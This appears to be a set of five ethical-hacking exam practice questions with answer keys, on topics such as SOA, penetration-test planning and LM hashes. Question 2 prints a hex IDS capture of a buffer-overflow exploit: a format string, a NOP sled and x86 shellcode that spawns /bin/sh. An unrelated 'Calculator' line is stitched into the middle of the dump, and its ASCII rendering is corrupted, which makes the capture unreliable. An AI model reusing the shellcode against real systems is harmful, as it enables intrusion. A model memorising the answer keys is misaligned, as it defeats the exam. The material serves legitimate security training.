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QUESTION 1

Which of the following is a design pattern based on distinct pieces of software providing application functionality as services to other applications?

- A. Service Oriented Architecture
- B. Object Oriented Architecture
- C. Lean Coding
- D. Agile Process

Correct Answer: A

A service-oriented architecture (SOA) is an architectural pattern in computer software design in which application components provide services to other components via a communications protocol, typically over a network.

References: https://en.wikipedia.org/wiki/Service-oriented_architecture

QUESTION 2

The following is an entry captured by a network IDS. You are assigned the task of analyzing this entry. You notice the value 0x90, which is the most common NOOP instruction for the Intel processor. You figure that the attacker is attempting a buffer overflow attack.

You also notice "/bin/sh" in the ASCII part of the output.

As an analyst what would you conclude about the attack?

```

45 00 01 ce 28 1e 40 00 32 06 96 92 d1 3a 18 09 86 9f 18 97 E..î(.ø.2...Ñ:.....
06 38 02 03 6f 54 4f a9 01 af fe 78 50 18 7d 78 76 dd 00 00 .8...oT0@.}pXP.))
Application "Calculator" "%path:..\dtsapps\calc\dcalc.exe%" " " size 0.75in 0.25in 0.50in
0.05in xvÝ..
42 42 20 f7 ff bf 21 f7 ff bf 22 f7 ff bf 23 f7 ff bf 58 58 BB ÷ÿç!÷ÿç"÷ÿç#÷ÿçXX
58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 25 2e 32 32 XXXXXXXXXXXXXXXXXXXX%.22
34 75 25 33 30 30 24 6e 25 2e 32 31 33 75 25 33 30 31 24 6e 4u*300$ñ*.213u*301$ñ
73 65 63 75 25 33 30 32 24 6e 25 2e 31 39 32 75 25 33 30 33 secu*302$ñ*.192u*303
24 6e 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 $ñ.....
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 .....
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90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 .....
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 .....
90 90 31 db 31 c9 31 c0 b0 46 cd 80 89 e5 31 d2 b2 66 89 d0 ..1Û1É1À°FÍ..Å10*f.Đ
31 c9 89 db 43 89 5d f8 43 89 5d f4 4b 89 4d fc 8d 4d f4 cd 1É.ĖC.]øC.]øK.Mù.MôÍ
80 31 c9 89 45 f4 43 66 89 5d ec 66 c7 45 ee 0f 27 89 4d f0 .1É.ĖøCf.]ifÇEí.'.Mô
8d 45 ec 89 45 f8 c6 45 fc 10 89 d0 8d 4d f4 cd 80 89 d0 43 .Ei.EøÆEü..Đ.MôÍ..ĐC
43 cd 80 89 d0 43 cd 80 89 c3 31 c9 b2 3f 89 d0 cd 80 89 d0 CÍ..ĐCÍ..Å1É*?.ĐÍ..Đ
41 cd 80 eb 18 5e 89 75 08 31 c0 88 46 07 89 45 0c b0 0b 89 AÍ.ě.^.u.1À.F..E.°..
f3 8d 4d 08 8d 55 0c cd 80 e8 e3 ff ff ff 2f 62 69 6e 2f 73 ó.M..U.í.eäÿÿÿ/bin/s
68 0a h.
EVENT4: [NOOP:X86] (tcp,dp=515,sp=1592)

```

- A. The buffer overflow attack has been neutralized by the IDS
- B. The attacker is creating a directory on the compromised machine
- C. The attacker is attempting a buffer overflow attack and has succeeded
- D. The attacker is attempting an exploit that launches a command-line shell

Correct Answer: D

QUESTION 3

What is the benefit of performing an unannounced Penetration Testing?

- A. The tester will have an actual security posture visibility of the target network.
- B. Network security would be in a "best state" posture.
- C. It is best to catch critical infrastructure unpatched.
- D. The tester could not provide an honest analysis.

Correct Answer: A

Real life attacks will always come without expectation and they will often arrive in ways that are highly creative and very hard to plan for at all. This is, after all, exactly how hackers continue to succeed against network security systems, despite the billions invested in the data protection industry. A possible solution to this danger is to conduct intermittent



"unannounced" penetration tests whose scheduling and occurrence is only known to the hired attackers and upper management staff instead of every security employee, as would be the case with "announced" penetration tests that everyone has planned for in advance. The former may be better at detecting realistic weaknesses.

References: <http://www.sitepronews.com/2013/03/20/the-pros-and-cons-of-penetration-testing/>

QUESTION 4

As a Certified Ethical Hacker, you were contracted by a private firm to conduct an external security assessment through penetration testing.

What document describes the specifics of the testing, the associated violations, and essentially protects both the organization's interest and your liabilities as a tester?

- A. Terms of Engagement
- B. Project Scope
- C. Non-Disclosure Agreement
- D. Service Level Agreement

Correct Answer: A

QUESTION 5

LM hash is a compromised password hashing function. Which of the following parameters describe LM Hash:?

- I -The maximum password length is 14 characters.
- II -There are no distinctions between uppercase and lowercase.
- III -It's a simple algorithm, so 10,000,000 hashes can be generated per second.

- A. I
- B. I, II, and III
- C. II
- D. I and II

Correct Answer: B

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